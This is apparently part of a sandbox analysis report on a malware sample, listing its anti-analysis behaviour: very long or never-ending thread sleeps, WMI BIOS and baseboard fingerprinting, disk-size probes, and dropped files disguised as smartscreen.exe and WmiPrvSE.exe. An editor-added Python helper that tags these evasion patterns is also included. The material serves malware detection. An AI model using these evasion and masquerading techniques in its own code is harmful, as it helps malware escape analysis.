Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -566141s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -565964s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -565816s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -565702s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -565509s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -565406s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -565199s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -565014s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -564885s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -564781s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -564669s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -564560s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -564452s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -564343s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -564234s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -564125s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -564016s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -563906s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -563797s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -563683s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -563566s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -563453s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -563341s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -563234s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -563125s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -562002s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -561887s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -561780s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -561672s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -561562s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -561438s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -561328s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -561157s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -561047s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -560934s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -560817s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -560703s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -560585s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -559885s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -559757s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 8420 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Downloads\smartscreen.exe TID: 8112 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Downloads\smartscreen.exe TID: 8408 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\WmiPrvSE.exe TID: 8104 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\WmiPrvSE.exe TID: 8424 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 5292 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8684 Thread sleep count: 2103 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9856 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9508 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4708 Thread sleep count: 2196 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9900 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9548 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9220 Thread sleep count: 2087 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10084 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9680 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9224 Thread sleep count: 2269 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10088 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9672 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9276 Thread sleep count: 1867 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9968 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9724 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9360 Thread sleep count: 1949 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9964 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9600 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9408 Thread sleep count: 2441 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10108 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10108 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9824 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9444 Thread sleep count: 1950 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9884 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9556 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9424 Thread sleep count: 2042 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10104 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9800 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9448 Thread sleep count: 2068 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10120 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9792 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9488 Thread sleep count: 2012 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10100 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9816 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9492 Thread sleep count: 2423 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10116 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10116 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9808 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 10032 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
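Triage helper for the evidence above (an example added by the editor; it is not part of the Joe Sandbox report and not code from the sample). It parses the "Thread sleep time", "Thread sleep count", "WMI Queries", "File Volume queried" and "File opened: PhysicalDrive" entries, aggregates them per process path and tags the anti-analysis patterns they form together: waits that never complete (-922337203685477 is numerically Int64.MaxValue in 100 ns ticks expressed in milliseconds, so a thread sleeping that long never wakes inside the sandbox window), sleeps at or above the report's own 30000 bar, thousands of short sleeps in a loop, a volume-size query, a raw PhysicalDrive open, and two or more hardware WMI classes queried by one process. The four classes shown for the dropped JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe (Win32_BaseBoard, Win32_BIOS, Win32_ComputerSystem, Win32_Processor) together describe a VM-fingerprinting routine, whereas a single such query is often benign inventory, so the check requires at least two. Two assumptions are the editor's, not the report's: that the sleep values are milliseconds despite the "s" suffix (600000 and 3600000 match 10 minutes and 1 hour), and the list of fingerprinting classes. The sample input is a subset of lines copied verbatim from this section.

```python
import re
from dataclasses import dataclass, field

# Editor's assumption: the sleep values are milliseconds despite the report's "s"
# suffix (600000 = 10 min, 3600000 = 1 h). Int64.MaxValue in 100 ns ticks,
# expressed in ms, is the sentinel printed for waits that never complete.
INFINITE_MS = 9223372036854775807 // 10_000   # 922337203685477
LONG_SLEEP_MS = 30_000                         # the report's own ">= -30000s" bar
# WMI classes routinely enumerated to fingerprint a VM (editor's list, not the report's).
FINGERPRINT_CLASSES = {"Win32_BaseBoard", "Win32_BIOS", "Win32_ComputerSystem",
                       "Win32_Processor", "Win32_VideoController", "Win32_PnPEntity"}

_SOURCE = re.compile(r"^Source:\s+(?P<proc>.+?\.exe)\s+(?P<rest>.+)$")
_PATTERNS = {
    "sleep":  re.compile(r"^TID:\s+(?P<tid>\d+)\s+Thread sleep time:\s+(?P<ms>-?\d+)s\s+>=\s+-?\d+s$"),
    "loop":   re.compile(r"^TID:\s+(?P<tid>\d+)\s+Thread sleep count:\s+(?P<n>\d+)\s+>\s+\d+$"),
    "wmi":    re.compile(r"^WMI Queries: IWbemServices::ExecQuery - (?P<ns>\S+) : SELECT \* FROM (?P<cls>\w+)$"),
    "volume": re.compile(r"^File Volume queried: (?P<vol>\S+) FullSizeInformation$"),
    "disk":   re.compile(r"^File opened: (?P<dev>PhysicalDrive\d+)$"),
}

# Constructed sample input: evidence lines copied verbatim from this report.
SAMPLE_LINES = (
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7860 Thread sleep count: 1649 > 30",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8376 Thread sleep time: -9223372036854770s >= -30000s",
    r"Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9928 Thread sleep time: -3600000s >= -30000s",
    r"Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 8420 Thread sleep time: -922337203685477s >= -30000s",
    r"Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard",
    r"Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS",
    r"Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem",
    r"Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor",
    r"Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File Volume queried: C:\ FullSizeInformation",
    r"Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0",
    r"Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 5292 Thread sleep time: -922337203685477s >= -30000s",
)

@dataclass
class ProcessSummary:
    process: str
    finite_sleeps_ms: list = field(default_factory=list)
    infinite_waits: int = 0
    loop_threads: dict = field(default_factory=dict)   # tid -> sleep count
    wmi_classes: set = field(default_factory=set)
    volume_size_queries: int = 0
    raw_disk_opens: int = 0

    def tags(self):
        # Anti-analysis patterns this process exhibits, in a fixed order.
        t = []
        if self.infinite_waits:
            t.append("unbounded-wait")
        if max(self.finite_sleeps_ms, default=0) >= LONG_SLEEP_MS:
            t.append("long-sleep")
        if self.loop_threads:
            t.append("sleep-loop")
        # One hardware class may be benign inventory; two or more from one process is fingerprinting.
        if len(self.wmi_classes & FINGERPRINT_CLASSES) >= 2:
            t.append("wmi-hw-fingerprint")
        if self.volume_size_queries:
            t.append("disk-size-probe")
        if self.raw_disk_opens:
            t.append("raw-disk-access")
        return t

def parse_line(line):
    """Return (process_path, kind, fields) for a recognised evidence line, else None."""
    m = _SOURCE.match(line.replace("Jump to behavior", "").strip())   # drop HTML link residue
    if not m:
        return None
    for kind, pat in _PATTERNS.items():
        f = pat.match(m["rest"])
        if f:
            return m["proc"], kind, f.groupdict()
    return None

def summarize(lines):
    """Aggregate evidence lines per process path."""
    out = {}
    for parsed in filter(None, map(parse_line, lines)):
        proc, kind, f = parsed
        s = out.setdefault(proc, ProcessSummary(proc))
        if kind == "sleep":
            ms = abs(int(f["ms"]))            # NT relative intervals are negative
            if ms >= INFINITE_MS:
                s.infinite_waits += 1
            else:
                s.finite_sleeps_ms.append(ms)
        elif kind == "loop":
            s.loop_threads[int(f["tid"])] = int(f["n"])
        elif kind == "wmi":
            s.wmi_classes.add(f["cls"])
        elif kind == "volume":
            s.volume_size_queries += 1
        elif kind == "disk":
            s.raw_disk_opens += 1
    return out

def report(lines):
    # Process path -> tags; an empty list means nothing was flagged for that process.
    return {proc: s.tags() for proc, s in summarize(lines).items()}
```

Feed report() the whole section, one evidence line per string, and it returns the tags each process path earned; on the sample above the dropped binary in C:\Users\Public\Videos comes out as unbounded-wait, long-sleep, wmi-hw-fingerprint and disk-size-probe, while svchost.exe is flagged only for the PhysicalDrive0 open, which on its own is normal service behaviour and needs the surrounding context before it means anything. The "Last function: Thread delayed" and "Thread delayed: delay time" entries are deliberately ignored: the former carries no value, and the latter largely repeats the values already present in the sleep lines.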
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Downloads\smartscreen.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Downloads\smartscreen.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\WmiPrvSE.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\WmiPrvSE.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 599719
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 599516
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 599297
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 599078
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 598469
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 598125
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 597942
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 100000
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 99812
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 99636
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 99438
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 99250
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 99070
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 98929
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 98782
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 98657
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 98530
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 595688
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 595529
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 595328
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 595125
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 30000
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 600000
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 599562
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 598984
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 598672
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 597906
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 597078
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 596641
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 596067
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 595375
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 595062
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 3600000
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 594234
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 593780
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 593234
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 592891
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 592516
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 591859
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 591500
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 591156
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 590859
